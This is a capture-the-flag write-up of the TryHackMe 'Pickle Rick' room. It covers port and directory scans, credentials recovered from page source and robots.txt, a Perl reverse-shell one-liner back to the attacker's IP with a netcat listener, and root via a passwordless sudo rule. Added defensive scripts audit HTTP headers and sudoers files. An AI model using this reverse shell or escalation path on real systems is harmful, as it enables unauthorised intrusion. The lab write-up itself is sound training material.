Pickle Rick - TryHackMe


Enumeration

Nmap scan result

# Nmap 7.91 scan initiated Thu May 27 08:23:53 2021 as: nmap -sV -sC -oN nmap/pickle_rick 10.10.11.26
Nmap scan report for 10.10.11.26
Host is up (0.19s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f7:72:fe:b9:a6:8a:40:99:46:b0:ff:34:50:7a:de:4e (RSA)
|   256 0b:0e:f8:1e:d5:aa:89:96:d5:4a:96:de:bd:83:3a:b6 (ECDSA)
|_  256 c2:9a:86:0e:c8:d8:27:6d:c1:b5:40:99:ce:47:92:7a (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 27 08:24:37 2021 -- 1 IP address (1 host up) scanned in 43.28 seconds

Here we found that port 80 is open. When you browse to port 80 you can see the web page.

Dirb scan result

┌─[][visith@parrot][~/CTF/thm/pickle_rick/nmap]
└──╼ $dirb http://10.10.11.26/  

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu May 27 09:27:19 2021
URL_BASE: http://10.10.11.26/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Stopping on warning messages

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.11.26/ ----
==> DIRECTORY: http://10.10.11.26/assets/                                                    
+ http://10.10.11.26/index.html (CODE:200|SIZE:1062)                                         
+ http://10.10.11.26/robots.txt (CODE:200|SIZE:17)                                           
+ http://10.10.11.26/server-status (CODE:403|SIZE:299)                                       
                                                            

/assets: not much of use.
/robots.txt: some text that looks like a password.
/server-status: forbidden (403).

Nikto scan result

To be doubly sure, I ran a Nikto scan.

┌─[][visith@parrot][~/CTF/thm/pickle_rick]
└──╼ $nikto -h http://10.10.11.26/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.11.26
+ Target Hostname:    10.10.11.26
+ Target Port:        80
+ Start Time:         2021-05-27 09:03:20 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 426, size: 5818ccf125686, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Cookie PHPSESSID created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7893 requests: 1 error(s) and 9 item(s) reported on remote host
+ End Time:           2021-05-27 09:09:16 (GMT5.5) (2156 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
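
The missing headers, the version-revealing Server banner and the PHPSESSID cookie without HttpOnly in the Nikto output above are all visible in a single raw response. The following is an added example (not code from the original writeup or from TryHackMe) that parses a raw HTTP response and reports exactly those gaps; the two response blocks are constructed to model the scanned box before and after hardening, and the header names checked are the ones Nikto named.

```python
"""Audit a raw HTTP response for the hardening gaps Nikto listed above."""

# Constructed sample modelled on the scan output: Apache version in the
# Server header, no hardening headers, PHPSESSID set without HttpOnly.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Thu, 27 May 2021 04:03:20 GMT\r\n"
    "Server: Apache/2.4.18 (Ubuntu)\r\n"
    "Set-Cookie: PHPSESSID=abc123; path=/\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html><title>Rick is sup4r cool</title></html>"
)

# Constructed: the same response after the fixes described in the usage note.
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "X-Frame-Options: SAMEORIGIN\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "X-XSS-Protection: 1; mode=block\r\n"
    "Set-Cookie: PHPSESSID=abc123; path=/; HttpOnly; Secure\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html></html>"
)

# Header name (lower case) -> why its absence matters, mirroring Nikto's wording.
EXPECTED_HEADERS = {
    "x-frame-options": "anti-clickjacking header not present",
    "x-content-type-options": "MIME sniffing not disabled",
    "x-xss-protection": "legacy XSS filter hint not defined",
}


def parse_headers(raw_response):
    """Return [(name_lower, value), ...] for the header block of a raw response."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    headers = []
    for line in head.split("\r\n")[1:]:  # skip the status line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.append((name.strip().lower(), value.strip()))
    return headers


def audit_response(raw_response):
    """Return a list of finding strings; an empty list means no gaps found."""
    headers = parse_headers(raw_response)
    present = {name for name, _ in headers}
    findings = [f"{name}: {why}" for name, why in EXPECTED_HEADERS.items()
                if name not in present]
    for name, value in headers:
        if name == "server" and "/" in value:
            findings.append(f"server header discloses version: {value}")
        if name == "set-cookie":
            cookie = value.split("=", 1)[0].strip()
            attrs = {a.strip().lower() for a in value.split(";")[1:]}
            if "httponly" not in attrs:
                findings.append(f"cookie {cookie} created without the HttpOnly flag")
            if "secure" not in attrs:
                findings.append(f"cookie {cookie} created without the Secure flag")
    return findings


if __name__ == "__main__":
    for label, resp in (("as scanned", SAMPLE_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(f"[{label}]")
        for finding in audit_response(resp) or ["no findings"]:
            print("  -", finding)
```

On an Apache host the usual fixes are mod_headers directives such as `Header always set X-Frame-Options "SAMEORIGIN"` and `Header always set X-Content-Type-Options "nosniff"`, `ServerTokens Prod` to drop the version from the Server banner, and `session.cookie_httponly = 1` in php.ini for the PHPSESSID cookie. X-XSS-Protection is kept here only because Nikto reports it; modern browsers ignore it and a Content-Security-Policy is the current control.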

Here we found /login.php. I looked through the page source for anything suspicious and found a username there, so we now have both a username and a password.

Credentials for www-data

http://10.10.11.26:80 -> page source for username
http://10.10.11.26/robots.txt -> password
Found username and password - R1ckRul3s:Wubbalubbadubdub

We have a shell now, so we can try some commands.



We found our first ingredient, but we can't 'cat' it from here. So I started thinking about a reverse shell.

Reverse shell

After messing around a bit trying to get a reverse shell, I finally managed it using the pentest monkey reverse shell cheat sheet. It was a Perl reverse connection. This is the shell; modify it to fit your IP and port (use your TryHackMe VPN IP).

This was my Perl reverse shell. I set up a netcat listener on port 9001.

perl -e 'use Socket;$i="10.9.0.173";$p=9001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

We got the shell. Now we can use the 'cat' command.

┌─[][visith@parrot][~/CTF/thm/pickle_rick]
└──╼ $nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.9.0.173] from (UNKNOWN) [10.10.11.26] 52402
/bin/sh: 0: can't access tty; job control turned off
$ ls
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt
$ whoami
www-data
$ cat Sup3rS3cretPickl3Ingred.txt
mr. meeseek hair
$ cat clue.txt
Look around the file system for the other ingredient.

clue.txt mentions the file system. We are currently in /var/www/html; when we go to /home we can find the second one.

$ cd home
$ ls
rick
ubuntu
$ pwd
/home
$ ls
rick
ubuntu
$ cd rick
$ ls
second ingredients
$ cat 'second ingredients'
1 jerry tear
$ 

Let's see if we can use ls to look into the /root directory. It seems we are not able to view anything in /root. I wonder if we can use sudo to elevate our privileges.

$ sudo -l
Matching Defaults entries for www-data on
    ip-10-10-11-26.eu-west-1.compute.internal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on
        ip-10-10-11-26.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL

Yeah, my guess was correct: we can get root privileges.

$ sudo su
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/home/rick
cd ../..
pwd
/
cd root
ls
3rd.txt
snap
cat 3rd.txt
3rd ingredients: fleeb juice
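
The root cause of the whole privilege escalation is the single sudoers rule `sudo -l` showed: the web server account www-data may run ALL commands as root with no password. The following is an added example (not code from the original writeup or from TryHackMe) of the check a defender would run over /etc/sudoers to catch that rule: it parses the common one-line rule form and flags service accounts that hold ALL or NOPASSWD rights. The sudoers fragment and the SERVICE_ACCOUNTS set are constructed for the example; the www-data line reproduces the rule reported above.

```python
"""Flag sudoers rules that hand a service account unrestricted or passwordless sudo."""
import re

# Constructed /etc/sudoers fragment: the www-data rule reproduces what
# 'sudo -l' reported above; the other lines are ordinary rules for contrast.
SAMPLE_SUDOERS = """\
Defaults        env_reset, mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
# User privilege specification
root            ALL=(ALL:ALL) ALL
%sudo           ALL=(ALL:ALL) ALL
www-data        ALL=(ALL) NOPASSWD: ALL
backup          ALL=(root) NOPASSWD: /usr/bin/rsync
"""

# Constructed list of accounts that should never run arbitrary commands as root.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "mysql", "postgres", "backup"}

# user  host=(runas) [TAG:] commands   (the parenthesised runas list is optional)
RULE_RE = re.compile(
    r"^(?P<user>[^\s#]\S*)\s+(?P<host>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
TAG_RE = re.compile(r"\b(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV)\s*:\s*")


def parse_sudoers(text):
    """Return one dict per user/group rule; Defaults, comments and blanks are skipped."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        cmds = m.group("cmds")
        rules.append({
            "user": m.group("user"),
            "host": m.group("host"),
            "runas": m.group("runas") or "root",
            "tags": set(TAG_RE.findall(cmds)),
            "cmds": TAG_RE.sub("", cmds).strip(),
        })
    return rules


def audit_sudoers(text, service_accounts=SERVICE_ACCOUNTS):
    """Return (severity, user, message) tuples for risky rules."""
    findings = []
    for rule in parse_sudoers(text):
        if rule["user"] not in service_accounts:
            continue
        nopasswd = "NOPASSWD" in rule["tags"]
        if rule["cmds"] == "ALL":
            msg = "service account may run ALL commands"
            if nopasswd:
                msg += " without a password"
            findings.append(("CRITICAL", rule["user"], msg))
        elif nopasswd:
            findings.append(("WARN", rule["user"],
                             f"passwordless sudo for: {rule['cmds']}"))
    return findings


if __name__ == "__main__":
    for severity, user, msg in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{severity:8} {user:10} {msg}")
```

The parser covers the one-line rule form only (no aliases, line continuations or `#include` handling), so run it over /etc/sudoers and each file in /etc/sudoers.d separately, after `visudo -c` has confirmed the files parse. The fix for the finding on this box is to delete the www-data rule outright; a web application that genuinely needs a privileged action should get a rule for that one command, not ALL.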
